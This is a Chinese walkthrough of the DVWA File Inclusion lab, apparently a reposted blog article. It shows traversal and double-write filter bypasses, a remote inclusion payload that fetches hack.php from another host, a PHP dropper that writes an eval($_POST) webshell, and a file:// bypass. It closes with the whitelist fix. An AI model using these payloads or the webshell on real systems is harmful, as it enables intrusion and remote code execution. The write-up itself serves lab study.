2. 程式人生 > >DVWA_File Inclusion 檔案包含 遠端檔案包含拿webshell

DVWA_File Inclusion 檔案包含 遠端檔案包含拿webshell

阿新 發佈:2018-11-03

 

 

MEDIUM:

$file = str_replace( array( "http://", "https://" ), "", $file ); 
$file = str_replace( array( "../", "..\"" ), "", $file );

  與LOW相比,將四個敏感字串過濾掉了:"http://", "https://","../", "..\""

 

本地檔案包含:

Payload1(相對路徑包含):

?page=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\phpStudy\PHPTutorial\WWW\dvwa\php.ini

原理:仔細看看可以發現,"..\"並沒有被過濾掉(過濾掉的多了一個雙引號)

 

Payload2(相對路徑包含):

?page=..././..././..././..././..././..././..././..././..././phpStudy\PHPTutorial\WWW\dvwa\php.ini

原理:str_replace()是非常不安全的,可是雙寫繞過,比如這個payload,經過str_replace()之後變成了:

?page=../../../../../../../../../phpStudy\PHPTutorial\WWW\dvwa\php.ini ("../"都被替換成了空字元)

 

Payload3(絕對路徑包含):

?page=C:\phpStudy\PHPTutorial\WWW\dvwa\php.ini

原理:並沒有過濾絕對路徑啊

 

遠端檔案包含:

Payload:?page=htthttp://p://192.168.141.1/hack.php

原理:str_replace()可以雙寫繞過

 

此外,在這種情況可以通過遠端檔案包含拿webshell,比如hack.php中可以這麼寫:

<?php
	$f = fopen('shell.php','w');
	$txt = '<?php eval($_POST[zzz])?>';
	fwrite($f,$txt);
	fclose($f);
?>

  然後菜刀一連就可以,嘿嘿嘿嘿~~~

(可惜筆者無論如何調整設定,allow_url_fopen就是打不開,我怎麼辦,我也很絕望啊)

 

HIGH:

核心程式碼:

if( !fnmatch( "file*", $file ) && $file != "include.php" ) { 
    // This isn't the page we want! 
    echo "ERROR: File not found!"; 
    exit; 
}

程式碼解讀:fnmatch(pattern,string)類似於ereg()或preg_match(),用pattern指定的模式去匹配string。

這裡*是萬用字元,所以"file*"的意思就是必須以file開頭。

 

這裡看似安全,其實我們可以使用php://file協議繞過

Payload:?page=file://C:\phpStudy\PHPTutorial\WWW\dvwa

php://file用以讀取伺服器本地檔案,而且在allow_url_fopen和allow_url_include雙off的情況下依然可以使用!

 

由於php://file只能讀取伺服器本地檔案,所以想要實現任意命令執行,需要檔案上傳的配合,

將惡意檔案上傳到伺服器之後,使用檔案包含進行包含以執行之。

 

IMPOSSBILE:

核心程式碼:

if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) { 
    // This isn't the page we want! 
    echo "ERROR: File not found!"; 
    exit; 
}

  可以看到,進行了白名單限制,無法攻破

 

鳴謝:

http://www.storysec.com/dvwa-file-inclusion.html

https://www.freebuf.com/articles/web/119150.html

相關推薦

DVWA_File Inclusion 檔案包含 遠端檔案包含webshell

    MEDIUM: $file = str_replace( array( "http://", "https://" ), "", $file ); $file = str_replace( array( "../", "..\"" ), "", $file );

18.phpmyadmin 4.8.1 遠端檔案包含漏洞(CVE-2018-12613)

phpmyadmin 4.8.1 遠端檔案包含漏洞(CVE-2018-12613) phpMyAdmin是一套開源的、基於Web的MySQL資料庫管理工具。其index.php中存在一處檔案包含邏輯, 通過二次編碼即可繞過檢查,造成遠端檔案包含漏洞。 受影響版本: phpMyAdmin 4.8.0和4

【root-me CTF練習】Web伺服器安全-PHP 遠端檔案包含

靶機地址 http://challenge01.root-me.org/web-serveur/ch13/ 解題思路 根據題目,得知考的應該是include()函式遠端包含檔案,那麼則需要php.ini的配置選項allow_url_fopen和allow_u

phpmyadmin 遠端檔案包含漏洞(CVE-2018-12613)

phpMyAdmin是一套開源的、基於Web的MySQL資料庫管理工具。其index.php中存在一處檔案包含邏輯,通過二次編碼即可繞過檢查,造成遠端檔案包含漏洞。 漏洞記錄 漏洞編號:CVE-2018-12613 受影響版本:phpMyAdmin 4.8.0和

DedeCMS 5.7 sp1遠端檔案包含漏洞(CVE-2015-4553)

DedeCMS 5.7 sp1遠端檔案包含漏洞(CVE-2015-4553) 一、漏洞描述 該漏洞在/install/index.php(index.php.bak)檔案中,漏洞起因是$$符號使用不當,導致變數覆蓋,以至於最後引起遠端檔案包含漏洞。 二、漏洞影響版本 DeDeCMS < 5.7-

C語言:解決多個C檔案包含同一標頭檔案引起的檔案重複包含問題

解決多個C檔案包含同一標頭檔案引起的檔案重複包含問題,並給出全域性變數如何定義和宣告的方法. 解決方法: 1. 定義公共檔案: global.c 和global.h 其中, global.c檔案中: #include "global.h" //定義全域性變數 int g

C檔案包含.h檔案包含.c檔案總結

原文連結:http://blog.csdn.net/yangtalent1206/article/details/6830051        很多人對C語言中的 “檔案包含”都不陌生了,檔案包含處理在程式開發中會給我們的模組化程式設計帶來很大的好處

maven打包不包含配置檔案

如果使用maven-jar-plugin和maven-dependency-plugin打包,排除配置檔案的方法: 上面的配置是把resources下的配置檔案不打進專案的jar包中,主要使用的是<excludes>(排除),如果想把resources下的部分配置打進去,可

Java讀取CSV檔案(CSV檔案資料內容包含逗號處理)

文章目錄 0. 前言 1. 解決方案 2. 程式碼片段 0. 前言 最近在公司寫專案時,有個匯入csv格式檔案資料的需求。Java讀取csv檔案時預設是按照 ,[英文逗號]分割的

c# 後臺post,包含file檔案

http request 相關 private bool Upload(KeyValuePair<string, string>[] paramString,Stream paramFileStream) { var actionUr

bugku-檔案包含2(檔案包含漏洞)

本文介紹三種方法,還會講到這道題菜刀的連線。  進入題目頁面,沒有什麼特別的,只能右鍵檢視原始碼,發現提示需要跳轉到 upload.php上傳頁面     方法一: ①新建一個txt檔案寫入  <script l

使用python實現RSA加解密演算法(包含讀取檔案操作),檔案內容為16進位制字串,同時實現對學號姓名的加密——(SCU應用密碼學實驗)

#-*- coding:UTF-8 -*- ''' time: 2018-5-30 content:RSA python 3.6 mac os ''' from random import randint import random im

SVN包含非法檔案系統格式選項/包含非法檔案系統格式選項

一、Error: “I:\svnServerPath\db\format”包含非法檔案系統格式選項"addressing logical" 使用的subversion(比如1.6)和TortoiseSVN(比如1.9.7)版本不配套 解決方法:升級subversion 二、Error:

好壓開啟包含solidworks檔案的壓縮包時非常卡頓

        在裝有solidworks的電腦上,用好壓開啟包含solidworks檔案(字尾為sldprt和sldasm)的壓縮包時,非常卡頓,拖動好壓視窗或者拖動滾動條,5秒以上才能反應過來,整個作業系統速度都會被拖得非常慢(絕不是因為不是電腦配置過低),關掉好壓後,系

gitignore 例子 只包含特定檔案

git工程只上傳必須的檔案,所以需要在一個檔案(跟目錄.gitignore)下面記錄需要忽略的檔案或資料夾。下面舉例.gitignore, 該模版適合去除一些指定目錄,並且僅僅包含其他目錄下的特定結尾的檔案: *!/**/##去除哪些路徑/dirignore1//dirignore2/##

Navicat 的檔案匯入匯出(包含查詢結果的匯出)

一、資料的匯入 1、在navicat中先新建一個數據表hrms_org 2、現從外部匯入相應的資料,先選中表,點選“匯入”。 3、選擇要匯入的檔案格式,此處以csv格式為例。 4、選擇要匯入檔案的路徑。 5、點選“下一步”。 6、確認源表與目

javaweb實現檔案下載(包含.txt檔案等預設在瀏覽器中開啟的檔案

檔案下載  剛開始研究檔案下載是找有關js的方法,找了好多發現對於.txt、.xls等檔案在瀏覽器中還是開啟,或者就是跨域問題。後來通過查詢資料發現可以在後臺對http相應頭設定引數,而且實現起來也不復雜。現總結如下: 文章參考 《javaweb檔案下載》、《根據網路url 實現w

maven-war-plugin:Maven打war包時,排除和包含指定檔案或目錄

通過使用<packagingIncludes>和<packagingExcludes>配置引數,可以在WAR檔案中包含或排除某些檔案或者目錄。 可以通過逗號分隔,配置多個檔案或者目錄路徑。 使用**等萬用字元表示多個目錄,使用*表示檔案或目錄名稱的可選

檔案包含檔案上傳組合拳

Target www.xxxxx.com 資訊蒐集 (1)埠掃描 目標開放埠 略 (2)探測服務 80 web 8080 web 8088 web (3)路徑掃描 略 (4)漏洞探測 通過對web服務進行探測,發現8080埠存在檔案包含漏洞,查看回顯自動添加了page_字首和php字

jsp:include引入jsp檔案的時候(如果被包含檔案存在js檔案),不要用相對路徑

先回憶一下二者的區別(對於此篇文章而言,二者在用法上沒有區別)   jsp:include是先編譯一下included.jsp檔案,然後再包含 先編譯,後包含 @ include是先把檔案包含就來,然後統一編譯 先包含,後編譯